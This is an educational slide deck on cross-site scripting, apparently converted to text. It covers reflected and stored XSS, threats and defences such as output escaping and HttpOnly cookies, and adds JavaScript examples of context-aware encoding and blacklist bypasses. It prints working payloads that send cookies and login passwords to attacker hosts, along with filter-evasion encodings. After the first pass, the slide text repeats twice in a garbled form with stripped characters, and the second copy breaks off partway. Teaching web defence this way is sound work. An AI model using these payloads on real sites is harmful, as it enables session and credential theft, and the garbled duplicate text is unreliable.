DESCRIPTION
Just a little info about how internet hacking is done and how to protect against it ...
The Internet is a great source for every kind of work, and for every task there is a different site.
Earlier these sites were static, i.e. just paragraphs and text files, which were a huge task to read.
Today's websites are far more complex than ever, containing a lot of graphic and dynamic content that makes the experience more enjoyable for the user.
Dynamic content
>> Images
>> Music
>> Different styled text
>> Advertisements
And many more ...
WELL, NOW LET US CONCENTRATE ON THE USEFUL MATTER ...
Cross Site Scripting
XSS
It is a type of computer security vulnerability found in web applications: untrusted content is injected into a dynamic web page, and neither the web site nor the client has enough information to recognize it as foreign. The flaw that lets the content through is called an XSS hole; the injected script or markup is the payload that runs in the victim's browser with the site's own privileges.
Causes
The DYNAMIC content ... Its look is attractive to users, but
like a worm it is eating away at the user from behind ...
Lack of CODING practice ... This cause is based on the fact that the
developer who writes the script lacks experience and fails to provide proper security: untrusted data is written into the page without being encoded for the place it lands in.
Threats ...
Taking over the user's session before the session cookie expires.
Connecting users to a malicious server of the attacker's choice.
Convincing a user to access an attacker-supplied URL, which causes script or HTML of the attacker's choice to be executed in the user's browser. Using this technique an attacker can take actions with the privileges of the user who accessed the URL, such as driving the application's own functions that issue queries against the underlying SQL database and viewing the results.
(Gmail example)
How it is performed
Cross-site scripting holes allow attackers to bypass the client-side security mechanisms (the same-origin policy) that modern browsers impose on web content. By finding a way to inject malicious script into a page served by the target site, an attacker's script runs as that site's own script and gains access to sensitive page content and to session cookies (information maintained by the browser on behalf of the user).
• XSS is an application-level attack which involves three parties: the attacker, the vulnerable site, and the victim's browser.
• External script can be loaded with a <script src="..."> tag.
• Script content can be loaded from anywhere (RPC/remote scripting is common).
• Most attacks are only focused on collecting cookies.
• The attacker does not see the server's actual responses to the client; anything the attacker wants must be leaked by the injected script.
• Page contents, form values, results from submits and JavaScript variables can be leaked as URL parameters with <img>, <script> and other tags whose src refers to the attacker's site.
Types of XSS Attacks

Non-Persistent
• It is the most common type. These holes show up when data provided by a web client, most commonly in HTTP query parameters or in HTML form submissions, is used immediately by server-side scripts to generate a page of results for that user without properly encoding it for the response.
• Because HTML documents have a flat, serial structure that mixes control statements, formatting and the actual content, any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection.

Persistent ...
The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing, without proper HTML escaping. A classic example is an online message board where users are allowed to post HTML-formatted messages for other users to read.
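The two variants above differ only in where the untrusted data comes from (the current request versus the server's store); the rendering mistake is the same. The following Node.js snippet is an added example, not code from the slides: it models a tiny message board with a search box, renders it once by concatenating raw input and once with HTML escaping, and checks whether the injected tag survives. The host name attacker.example, the payloads and the request objects are all constructed for this example.

```javascript
// Added example (not from the original slides): reflected vs stored XSS in a
// minimal message-board renderer. No network involved; "requests" are plain
// objects constructed below.

// HTML entity encoding for the element-body context (& < > " ').
const escapeHtml = (s) =>
  String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);

// Server-side state: the store that makes the persistent variant possible.
const messages = [];

function postMessage(text) {
  messages.push(text); // stored verbatim, as a vulnerable board would do
}

// Vulnerable renderer: untrusted data is concatenated straight into markup.
// query.q comes from the URL (reflected); messages[] came from earlier posts (stored).
function renderVulnerable(query) {
  const q = query.q || '';
  const list = messages.map((m) => `<li>${m}</li>`).join('');
  return `<h1>Results for ${q}</h1><ul>${list}</ul>`;
}

// Fixed renderer: every untrusted value is escaped for the element-body
// context it lands in. Storage is unchanged; only the output changes.
function renderFixed(query) {
  const q = escapeHtml(query.q || '');
  const list = messages.map((m) => `<li>${escapeHtml(m)}</li>`).join('');
  return `<h1>Results for ${q}</h1><ul>${list}</ul>`;
}

// Crude check: did an injected tag make it into the page as real markup?
// (Escaped payloads contain "&lt;script", which does not match.)
function containsInjectedTag(html) {
  return /<(script|img|iframe)\b/i.test(html);
}

// Constructed payloads modelled on the slides' cookie-theft examples.
const REFLECTED_PAYLOAD =
  '<script>document.location="http://attacker.example/?"+document.cookie</script>';
const STORED_PAYLOAD =
  '<img src=x onerror="new Image().src=\'http://attacker.example/?\'+document.cookie">';

function demo() {
  // Reflected: the victim follows an attacker-supplied link carrying the payload.
  const reflectedVuln = renderVulnerable({ q: REFLECTED_PAYLOAD });
  const reflectedFixed = renderFixed({ q: REFLECTED_PAYLOAD });

  // Stored: the attacker posts once; every later visitor receives the payload.
  postMessage('hello from a normal user');
  postMessage(STORED_PAYLOAD);
  const storedVuln = renderVulnerable({ q: '' });
  const storedFixed = renderFixed({ q: '' });

  return {
    reflectedVulnerable: containsInjectedTag(reflectedVuln),
    reflectedFixed: containsInjectedTag(reflectedFixed),
    storedVulnerable: containsInjectedTag(storedVuln),
    storedFixed: containsInjectedTag(storedFixed),
    fixedStoredHtml: storedFixed,
  };
}
```

Run with `node` and inspect `demo()`: the vulnerable renderer emits the payload as live markup in both cases, the fixed one emits it as visible text. Note that escapeHtml is correct only for text inside an element or a quoted attribute; other output contexts need their own encoders.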
Examples of attacks ...

Scripting via malicious link ...

In this scenario the attacker sends a specially crafted e-mail message to a victim containing a malicious link like:
<A HREF="http://legitimateSite.com/registration.cgi?clientprofile=<SCRIPT>malicious code</SCRIPT>">Click here</A>
When the user clicks on this link, the URL, including the malicious code, is sent to legitimateSite.com. If the legitimate server sends a page back to the user that includes the value of clientprofile unencoded, the malicious code will be executed in the client's web browser.
Stealing a user's COOKIE ...

If any part of the web site uses cookies, then it may be possible to steal them from its users. In this scenario the attacker posts a page containing malicious script to the part of the site that is vulnerable. When the page is displayed, the malicious script runs, collects the user's cookies and sends a request to the attacker's web site carrying the cookies it gathered. Using this technique the attacker can gain sensitive data such as passwords, credit card numbers and any arbitrary information the user inputs.
Sending an unauthorized request

In this scenario the user unknowingly executes scripts written by an attacker after following a malicious link in a mail message. Because the malicious scripts are executed in a context that appears to have originated from the legitimate server, the attacker has full access to the document retrieved and may send data contained in the page back to their own site. If the embedded script can also interact with the legitimate server without alerting the victim, the attacker can post data on the victim's behalf to a different page on the legitimate web server.
By Scripting

A script can read all HTML content and tags in another window.
A script can set or delete tags and content in another window; it can read and set form values and then call submit().
A script can set variables and call functions in another window.
document.write() allows a script to create new tags and content in another window.
This means that a script can read all HTML contents of a document, change the appearance of the document, modify existing tags and values, and modify and submit forms. The script has full control of the other window as long as it is in the same document.domain; this is exactly the access an XSS payload inherits by running as the site's own script.
If cookies can be forwarded, then any other JavaScript-accessible content can be forwarded to an attacker as well: page contents, form values (including hidden fields ...), JavaScript variables and state, and JavaScript errors.
Some FACTS about XSS attacks ...

By SURVEY ...
1st-generation XSS was against public sites and ran against everyone that visited the site.
2nd-generation XSS focused on sites that allow self-reflection (reflected) XSS.

• Cross-site scripting attacks are a special case of code injection.
• Cross-site scripting carried out on websites was roughly 80% of all security vulnerabilities documented by Symantec as of 2007.
• Their impact may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data.
[Diagram: Dynamic XSS with two-way comms]
Victim browser: the XSS against the site runs script commands in the page; an IFRAME inside the page loads other documents from the same site. The script ships what it reads to the attacker system with <script src="attacker.com/innerHTML_of_IFRAME">, and the attacker system answers with new JavaScript (<script src="attacker.com">) that runs in the browser against the XSS-vulnerable server.
Some prominent sites that have been affected in the past are ...
The search engine Google; the email services of Google and Yahoo; the social networking sites Facebook, MySpace and Orkut. The developers of MediaWiki have fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users.
Researchers have claimed that as many as 68% of websites are likely open to XSS attacks.
Seeing all this, the question that arises is ...
Then how can we prevent it?

Yes, there are some methods for prevention, and those are:
>> Filtering
>> Cookie Security
>> Disabling Scripts
>> Encryption
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields, or, more reliably, to escape all untrusted data using a method appropriate for the output context. Several different escaping schemes must be used depending on where the untrusted string is placed: HTML entity encoding, JavaScript escaping, CSS escaping and URL encoding. Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner. Input filtering on its own is the weaker half: a keyword blacklist can be dodged with encoded or split keywords (see the syntax slide further on), whereas output escaping does not care what the string looks like.
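The "appropriate for the output context" part is where escaping usually goes wrong in practice. The block below is an added example (not code from the slides) that renders the same untrusted value into four places of a page fragment, once with HTML entity encoding everywhere and once with an encoder chosen per context, and shows the two cases entity encoding alone does not cover: an unquoted attribute and a URL attribute. The http(s)-only scheme policy, the payloads and the helper names are assumptions made for this example.

```javascript
// Added example (not from the original slides): context-aware output
// encoding. HTML entity encoding of & < > " ' is enough inside an element
// body or a quoted attribute, but not inside an unquoted attribute or a URL.

const htmlEncode = (s) =>
  String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);

// Unquoted attribute: everything but [A-Za-z0-9] becomes a numeric entity,
// so whitespace and '=' cannot start a new attribute.
const attrEncodeUnquoted = (s) =>
  String(s).replace(/[^A-Za-z0-9]/g, (c) => `&#${c.charCodeAt(0)};`);

// URL attribute: allow only http(s) (assumed policy for this example), then
// entity-encode the survivor so it cannot break out of the attribute either.
function urlEncodeForHref(s) {
  // Browsers strip ASCII tab/newline while parsing URLs, so strip them first
  // or "javasc<TAB>ript:" would pass the scheme check below.
  const normalized = String(s).trim().replace(/[\t\n\r]/g, '');
  if (!/^https?:\/\//i.test(normalized)) return '#'; // refuse other schemes
  return htmlEncode(normalized);
}

// The output contexts this example supports.
function encodeFor(context, value) {
  switch (context) {
    case 'html':          return htmlEncode(value);
    case 'attr-quoted':   return htmlEncode(value);
    case 'attr-unquoted': return attrEncodeUnquoted(value);
    case 'url':           return urlEncodeForHref(value);
    default: throw new Error(`unknown context: ${context}`);
  }
}

// Same fragment rendered two ways: entity encoding everywhere (a common
// mistake) versus one encoder per context.
function renderNaive(v) {
  return `<div>${htmlEncode(v)}</div>` +
         `<input value="${htmlEncode(v)}">` +
         `<input value=${htmlEncode(v)}>` +
         `<a href="${htmlEncode(v)}">link</a>`;
}

function renderContextAware(v) {
  return `<div>${encodeFor('html', v)}</div>` +
         `<input value="${encodeFor('attr-quoted', v)}">` +
         `<input value=${encodeFor('attr-unquoted', v)}>` +
         `<a href="${encodeFor('url', v)}">link</a>`;
}

// Detectors for the two breakouts entity encoding misses. Regexes, not an
// HTML parser; sufficient to illustrate the point on these inputs.
// An event handler counts only when it follows an UNQUOTED value attribute.
const hasInjectedEventHandler = (html) => /<input value=[^"\s>]*\s+on\w+=/i.test(html);
const hasJavascriptHref = (html) => /href="javascript:/i.test(html);

// Constructed payloads: one targets the unquoted attribute, one the href.
// Neither contains any of & < > " ', so entity encoding leaves them untouched.
const ATTR_PAYLOAD = 'x onmouseover=alert(1)';
const URL_PAYLOAD = 'javascript:alert(document.cookie)';
```

Running `renderNaive(ATTR_PAYLOAD)` yields `<input value=x onmouseover=alert(1)>`, a working event handler, even though nothing "dangerous" was left unencoded; `renderContextAware` turns the space and `=` into entities. For the href, no amount of encoding helps against a `javascript:` scheme; the value has to be rejected or restricted to an allowed scheme.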
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests, and because client-side scripts generally have access to these cookies, simple XSS exploits can steal them. To mitigate this particular threat, many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie. Two caveats: IP binding does not stop a script already running in the victim's browser, whose requests come from the bound address anyway, and it breaks for users whose address changes mid-session (NAT pools, mobile networks). Marking the session cookie HttpOnly, so that document.cookie cannot read it, addresses the cookie-theft case directly.
Disabling Scripts ...
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis.
Functionality that blocks all scripting and external inclusions by default, and then lets the user enable it per domain, is more effective ...
Problems with this ... A substantial reduction in functionality and
responsiveness. Many sites do not work without client-side
scripting, forcing users to disable the protection for that site and opening their systems to the threat.
The easiest way to protect yourself as a user is to follow only links from the main website you wish to view, and to use its own search engine to find the content rather than links supplied by others.
For explanation purposes
Remember the syntax ...

SYNTAX
• Script injection in an image src tag
• Embed nested quotes: ' or " or \u0022 \u0027
• Keyword filters that allow any JS to execute are useless: A = 'navi'; B = 'gator.userAgent'; alert(eval(A+B))
• Limited input length + script block embed = unlimited script power (<script src=...>)
• SSL pages warn if a script src comes from an untrusted site, but not if you can upload, say, an image that is actually JS commands
• Methods of script encoding:
  <img src="vbscript:do&#x63;ument.lo&#x63;ation='http://ab.com'">
  <IMG SRC="javascript:alert('test')">
  <IMG SRC="javasc	ript:alert('test')">   (a tab inside the keyword splits what a filter is matching on)
The javascript: and vbscript: image sources above executed only in browsers of that era; current browsers do not run script from an img src. The entity-encoding and tab-splitting tricks, however, still defeat keyword filters wherever a javascript: URL is honoured, such as an href.
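The reason the slide calls keyword filters useless is that the filter inspects the raw text while the browser acts on a normalised version of it. The block below is an added example (not code from the slides): a blacklist of the kind such filters use, a model of two normalisations the browser applies to an attribute value (numeric entity decoding and removal of ASCII tab/newline in URLs), and the slide's payloads run through both. The blacklist contents, the payload texts and the helper names are constructed for this example; the filter deliberately omits vbscript:, a second and separate mistake that the vbscript payload also relies on.

```javascript
// Added example (not from the original slides): what a keyword blacklist
// sees versus what the browser sees for the slide's payloads.

// The naive filter: case-insensitive substring match against the raw input.
// (vbscript: is deliberately missing, as many such lists of the time were.)
const BLOCKED = ['<script', 'javascript:', 'document.', 'navigator'];

function blacklistRejects(input) {
  const lower = String(input).toLowerCase();
  return BLOCKED.some((word) => lower.includes(word));
}

// Decode &#NNN; and &#xHH; numeric character references, as the HTML
// tokenizer does for attribute values before the URL is ever looked at.
function decodeNumericEntities(s) {
  return String(s)
    .replace(/&#x([0-9a-f]+);/gi, (_, hex) => String.fromCharCode(parseInt(hex, 16)))
    .replace(/&#(\d+);/g, (_, dec) => String.fromCharCode(parseInt(dec, 10)));
}

// What the browser ends up with in src/href: entities decoded, then ASCII
// tab/newline removed (the URL parser strips them anywhere in the URL).
function browserView(attrValue) {
  return decodeNumericEntities(attrValue).replace(/[\t\n\r]/g, '');
}

// Scheme of a URL as the browser would classify it, or null if none.
function urlScheme(v) {
  const m = /^\s*([a-z][a-z0-9+.-]*):/i.exec(v);
  return m ? m[1].toLowerCase() : null;
}

// Constructed attribute-value payloads modelled on the slide.
const PAYLOADS = {
  // "javasc<TAB>ript:" splits the keyword the filter is looking for.
  tabSplit: "javasc\tript:alert('test')",
  // do&#x63;ument.lo&#x63;ation hides "document." from the filter.
  entityEncoded: "vbscript:do&#x63;ument.lo&#x63;ation='http://ab.com'",
  // Decimal variant of the same trick, hiding "javascript:".
  decimalEntity: 'java&#115;cript:alert(1)',
};

// A = 'navi'; B = 'gator.userAgent'; alert(eval(A+B)): the blocked identifier
// only exists at run time. Evaluating the concatenation here (our own
// constant, never untrusted input) shows what eval would receive.
const SPLIT_KEYWORD_SOURCE = "'navi' + 'gator.userAgent'";
function reassembledKeyword() {
  return new Function('return ' + SPLIT_KEYWORD_SOURCE)();
}

// For each payload: does the filter reject it, and what does the browser see?
function audit() {
  const out = {};
  for (const [name, p] of Object.entries(PAYLOADS)) {
    const seen = browserView(p);
    out[name] = {
      rejectedByFilter: blacklistRejects(p),
      browserScheme: urlScheme(seen),
      browserSees: seen,
    };
  }
  return out;
}
```

`audit()` reports every payload as passing the filter while the browser-side view carries a javascript: or vbscript: scheme and the plain `document.location` text. Output encoding (previous slides) sidesteps the whole race: it never tries to recognise the payload, so there is nothing to split or encode around.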
Types of information leakage
The client can reveal cookies to a 3rd party (session state, order info, etc.):
http://host/a.php?variable="><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?'%20+document.cookie</script>
The client can reveal posted form items to a 3rd party (user ID, password, etc.):
<form action="logoninformation.jsp" method="post" onsubmit="hackImg=new Image; hackImg.src='http://www.malicioussite.com/'+document.forms(1).login.value+':'+document.forms(1).password.value;"></form>
The client can be tricked into accessing or posting spoofed info to the trusted server:
www.trustedserver.com/xss.asp?name=<iframe src=http://www.trustedserver.com/auth_area/orderupdate?items=4000></iframe>
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1. http://www.cgisecurity.com/archive/php/phpNuke_cross_site_scripting.txt
2. http://www.cgisecurity.com/archive/php/phpNuke_CSS_5_holes.txt
3. http://www.cgisecurity.com/archive/php/phpNuke_2_more_CSS_holes.txt
Related vulnerabilities
Several classes of vulnerabilities or attack techniques are related to XSS. Cross-zone scripting exploits zone concepts in certain browsers and usually executes code with greater privilege.[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems at the HTTP protocol level (in addition to enabling attacks such as HTTP response splitting).[32]
Cross-site request forgery (CSRF/XSRF) is almost the opposite of XSS: rather than exploiting the user's trust in a site, the attacker (and his malicious page) exploits the site's trust in the client software, submitting requests that the site believes represent conscious and intentional actions of authenticated users.[33]
Lastly, SQL injection exploits a vulnerability in the database layer of an application: when user input is incorrectly filtered, arbitrary SQL statements can be executed by the application.
2
Dynamic content
gtgt Imagesgtgt Musicgtgt Different Styled Textgtgt Advertisements
And many more helliphelliphellip
3
WELL NOW LET US CONCENTRATE ON THE USEFUL MATTERhelliphelliphelliphellip
4
Cross Site Scripting
XSS
5
It is a type of computer security vulnerability found in web applications which is done by injection or introduction of untrusted content into a dynamic web page about which neither the Web sites nor the client has enough information to
recognize ithellip amp this injected code is called XSS Holehellip
6
Causes
The DYNAMIC contenthelliphellip Its overview is attractive for the users but
like worms it is eating the user at the backhellip
Lack of CODE practicinghelliphellip This cause is based on the fact that the
developer who inserts the script has not a lot of experience and is in deficient to provide proper security
7
Threats helliphelliphelliphelliphellip
Taking over the user session before the users session cookie expires
Connect users to a malicious server of the attackers choice
Convince a user to access a URL supplied by the attacker could cause script or HTML of the attackers choice to be executed in the users browser Using this technique an attacker can take actions with the privileges of the user who accessed the URL such as issuing queries on the underlying SQL databases and viewing the results
(GMAIL example)
8
How it is performed
Cross-site scripting holes allow attackers to bypass client-side security mechanisms imposed on web content by modern browsers By finding ways of injecting malicious scripts into web pages an attacker can gain elevated access privileges to sensitive page content session cookies(information maintained by the browser on behalf of the user)
9
bullXSS is an application level attack whichinvolves 3 parties
bullWe can load external script with a ltscript src=xxxgt tag
bullScript content can be loaded from anywhere (RPCRemote scripting is common)
bullMost attacks are only focused on collecting cookies
bullAttacker does not know actual responses to client
bullWe can leak contents of pages form values results from submits and javascript vars as URL parameters with ltimagegt ltscriptgt and other tag refers to attacker site
10
Types of XSS Attacks
11
Non-Persistent
bull It is the most common type These holes show up when the data is provided by a web client most commonly in HTTP query parameters or in HTML form submissions is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the responsebull Because HTML documents have a flat serial structure that mixes control statements formatting and the actual content any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection
12
Persistenthellip
The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing without proper HTML escaping A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read
13
Examples of attackshelliphelliphellip
14
Scripting Via Malicious Linkhellip
15
In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser
16
Stealing Userrsquos COOKIEhellip
17
If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs
18
Sending an Unauthorized Request
19
In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server
20
By Scripting
21
Script can read all HTML contenttags in other window
Script can setdelete tagscontent in other window We can read and set form values then run a submit()
Script can set vars and call functions in other window
Documentwrite can allow script to create new tagscontent in other window
This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain
If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors
22
Some FACTS about the XSS attackshelliphelliphellip
23
By SURVEYhelliphelliphellip
1st Gen XSS was against public sites and ran against everyone that visited site
2nd Gen XSS focused on sites that allow self-reflection XSS
24
bull Cross-site scripting attacks are a special case of code injection
bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007
bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
3
WELL NOW LET US CONCENTRATE ON THE USEFUL MATTERhelliphelliphelliphellip
4
Cross Site Scripting
XSS
5
It is a type of computer security vulnerability found in web applications which is done by injection or introduction of untrusted content into a dynamic web page about which neither the Web sites nor the client has enough information to
recognize ithellip amp this injected code is called XSS Holehellip
6
Causes
The DYNAMIC contenthelliphellip Its overview is attractive for the users but
like worms it is eating the user at the backhellip
Lack of CODE practicinghelliphellip This cause is based on the fact that the
developer who inserts the script has not a lot of experience and is in deficient to provide proper security
7
Threats helliphelliphelliphelliphellip
Taking over the user session before the users session cookie expires
Connect users to a malicious server of the attackers choice
Convince a user to access a URL supplied by the attacker could cause script or HTML of the attackers choice to be executed in the users browser Using this technique an attacker can take actions with the privileges of the user who accessed the URL such as issuing queries on the underlying SQL databases and viewing the results
(GMAIL example)
8
How it is performed
Cross-site scripting holes allow attackers to bypass client-side security mechanisms imposed on web content by modern browsers By finding ways of injecting malicious scripts into web pages an attacker can gain elevated access privileges to sensitive page content session cookies(information maintained by the browser on behalf of the user)
9
bullXSS is an application level attack whichinvolves 3 parties
bullWe can load external script with a ltscript src=xxxgt tag
bullScript content can be loaded from anywhere (RPCRemote scripting is common)
bullMost attacks are only focused on collecting cookies
bullAttacker does not know actual responses to client
bullWe can leak contents of pages form values results from submits and javascript vars as URL parameters with ltimagegt ltscriptgt and other tag refers to attacker site
10
Types of XSS Attacks
11
Non-Persistent
bull It is the most common type These holes show up when the data is provided by a web client most commonly in HTTP query parameters or in HTML form submissions is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the responsebull Because HTML documents have a flat serial structure that mixes control statements formatting and the actual content any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection
12
Persistenthellip
The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing without proper HTML escaping A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read
13
Examples of attackshelliphelliphellip
14
Scripting Via Malicious Linkhellip
15
In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser
16
Stealing Userrsquos COOKIEhellip
17
If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs
18
Sending an Unauthorized Request
19
In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server
20
By Scripting
21
Script can read all HTML contenttags in other window
Script can setdelete tagscontent in other window We can read and set form values then run a submit()
Script can set vars and call functions in other window
Documentwrite can allow script to create new tagscontent in other window
This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain
If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors
22
Some FACTS about the XSS attackshelliphelliphellip
23
By SURVEYhelliphelliphellip
1st Gen XSS was against public sites and ran against everyone that visited site
2nd Gen XSS focused on sites that allow self-reflection XSS
24
bull Cross-site scripting attacks are a special case of code injection
bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007
bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
